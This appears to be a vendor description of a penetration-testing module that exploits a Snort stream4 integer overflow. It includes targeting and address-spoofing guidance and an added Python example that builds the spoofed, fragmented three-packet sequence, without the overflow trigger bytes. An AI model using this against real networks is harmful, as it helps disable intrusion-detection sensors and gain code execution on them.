Snort TCP Stream Integer Overflow v1.21
Vulnerability exploited: CAN-2003-0209 - BID-7178
Category: Exploits/Remote
This module exploits an integer overflow in the TCP stream reassembly preprocessor (stream4) of a vulnerable Snort sensor and installs an agent that connects back to the Impact console. If the attack succeeds, a new host appears in the entity view with an installed agent. Although you can often use this module by simply dragging and dropping it onto a host, it is important to understand how it works and to think about the most appropriate way to use it in your situation.
The module needs a destination address and a source address. The destination address is the address of the host you drop the module onto. The source address defaults to 0.0.0.0 in the module configuration; if you leave it unchanged, the module tries to find another host in the same /24 network as the destination and uses it as the source address. If no suitable source address can be found, the module fails and you must set the value manually. IMPORTANT: both hosts must actually exist. The last-hop router only places a packet on the segment after the destination IP has answered its ARP request with a MAC address; if the host does not exist, the router never transmits the packets and a Snort sensor on that segment never sees them.
The module sends three TCP packets. The first two are very large (about 64K each) and are fragmented into 64 fragments of 1K. Both are sent with spoofed addresses so that they appear to travel from the source address and port (SOURCE_HOST, SOURCE_PORT) to the destination (TARGET, DESTINATION_PORT). Either DESTINATION_PORT or SOURCE_PORT must be one of Snort's default reassembly ports (21, 23, 25, 53, 80, 110, 111, 143, 513), otherwise stream4 does not reassemble the session at all.
The third packet is spoofed in the reverse direction, from the destination (TARGET, DESTINATION_PORT) back to the source (SOURCE_HOST, SOURCE_PORT), as if it were the server's response to the client.
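To make the address selection and the three-packet sequence concrete, the following is an added Python example; it is not CORE IMPACT code and not from the Snort project. It picks a source host in the target's /24 from a constructed list of hosts known to answer ARP, enforces the reassembly-port rule, builds the two large segments and splits each into 1K IPv4 fragments with correct checksums, and builds the third packet in the reverse direction. The function names, the `ident` values, the sequence numbers and the filler payload are assumptions; the page does not describe the bytes that trigger the overflow, so none are reproduced here.

```python
import ipaddress
import struct

# Snort stream4 default reassembly ports, as listed on the page.
DEFAULT_REASSEMBLY_PORTS = {21, 23, 25, 53, 80, 110, 111, 143, 513}
FRAGMENT_SIZE = 1024          # "1K" fragments, as the page describes
MAX_IPV4_PAYLOAD = 65535 - 20  # largest TCP segment one IPv4 datagram can carry


def checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement Internet checksum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def pick_source_host(target: str, hosts_answering_arp) -> str:
    """Mirror the 0.0.0.0 default: use another live host in the target's /24.

    `hosts_answering_arp` is assumed to come from prior discovery; here the
    caller passes a constructed list. Raises LookupError when nothing fits,
    which is the case where SOURCE_HOST must be set by hand.
    """
    net = ipaddress.ip_network(f"{target}/24", strict=False)
    for host in hosts_answering_arp:
        if host != target and ipaddress.ip_address(host) in net:
            return host
    raise LookupError(f"no live host in {net}; set SOURCE_HOST manually")


def tcp_segment(src, dst, sport, dport, seq, ack, flags, payload: bytes) -> bytes:
    """TCP header (no options) + payload, checksummed over the IPv4 pseudo-header."""
    hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, 65535, 0, 0)
    pseudo = (ipaddress.ip_address(src).packed + ipaddress.ip_address(dst).packed
              + struct.pack("!BBH", 0, 6, len(hdr) + len(payload)))
    csum = checksum(pseudo + hdr + payload)
    return hdr[:16] + struct.pack("!H", csum) + hdr[18:] + payload


def ip_fragments(src, dst, segment: bytes, ident: int, mtu=FRAGMENT_SIZE) -> list:
    """Split one TCP segment into IPv4 fragments carrying at most `mtu` bytes each.

    All fragments share `ident`; every fragment but the last sets MF (bit 13),
    and the offset field counts 8-byte units, so `mtu` must be a multiple of 8.
    """
    frags = []
    for off in range(0, len(segment), mtu):
        chunk = segment[off:off + mtu]
        more = off + mtu < len(segment)
        flags_frag = ((1 if more else 0) << 13) | (off // 8)
        hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(chunk), ident, flags_frag,
                          64, 6, 0, ipaddress.ip_address(src).packed,
                          ipaddress.ip_address(dst).packed)
        hdr = hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]
        frags.append(hdr + chunk)
    return frags


def build_attack(source_host, target, sport, dport, ident=0x1000):
    """Return the three packets as lists of IPv4 fragments: [pkt1, pkt2, pkt3].

    Sequence/ack numbers simply describe one consecutive stream; the real
    module's values are not on the page. The payload is constructed filler.
    """
    if sport not in DEFAULT_REASSEMBLY_PORTS and dport not in DEFAULT_REASSEMBLY_PORTS:
        raise ValueError("SOURCE_PORT or DESTINATION_PORT must be a stream4 reassembly port")
    big = b"A" * (MAX_IPV4_PAYLOAD - 20)   # ~64K of filler after the 20-byte TCP header
    ACK, PSH = 0x10, 0x08
    seq0 = 1
    # Packets 1 and 2: client -> server, each a ~64K segment split into 64 fragments.
    pkt1 = ip_fragments(source_host, target,
                        tcp_segment(source_host, target, sport, dport, seq0, 1, ACK | PSH, big),
                        ident)
    pkt2 = ip_fragments(source_host, target,
                        tcp_segment(source_host, target, sport, dport, seq0 + len(big), 1,
                                    ACK | PSH, big), ident + 1)
    # Packet 3: server -> client, spoofed as the server's acknowledgement.
    pkt3 = ip_fragments(target, source_host,
                        tcp_segment(target, source_host, dport, sport, 1,
                                    seq0 + 2 * len(big), ACK, b""), ident + 2)
    return [pkt1, pkt2, pkt3]


if __name__ == "__main__":
    src = pick_source_host("192.168.10.3", ["10.0.0.5", "192.168.10.2"])  # constructed
    pkts = build_attack(src, "192.168.10.3", 1025, 80)
    print([len(p) for p in pkts])  # fragment count per packet
```

The fragments are returned as bytes rather than transmitted; putting them on the wire needs a raw socket and the routing caveat above still applies, since none of this helps if the router never ARP-resolves the spoofed addresses.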
For the exploit to work, Snort must see all three packets. Since you probably do not know which machines run Snort sensors, you have to make an educated guess about where to send the packets. One approach is to spoof the addresses of two hosts that exist on the network you are attacking (for example src=192.168.10.2 and dst=192.168.10.3 if 192.168.10.0/24 is your target). This works against a Snort sensor monitoring 192.168.10.0/24 and also against any upstream Snort sensor on the path.
The exploit only gains code execution on Snort sensors running on Linux/x86, but it is also useful for crashing and disabling sensors running on any other platform.
Supported Systems:
This module is included in the latest version of CORE IMPACT.